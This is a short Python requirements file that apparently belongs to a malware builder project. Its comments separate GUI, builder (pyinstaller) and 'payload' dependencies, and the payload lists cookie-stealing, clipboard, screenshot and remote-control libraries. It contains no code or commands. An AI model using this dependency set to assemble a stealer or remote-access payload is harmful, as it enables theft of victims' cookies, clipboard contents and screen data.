# For the GUI
customtkinter
requests
websockets==8.1  # <--- CRITICAL CHANGE
Pillow

# For the builder
pyinstaller

# For the payload itself (needed by the builder)
psutil
pycryptodomex
pywin32
pyperclip
browser-cookie3
mss
pyautogui
websockets==8.1  # <--- CRITICAL CHANGE
Pillow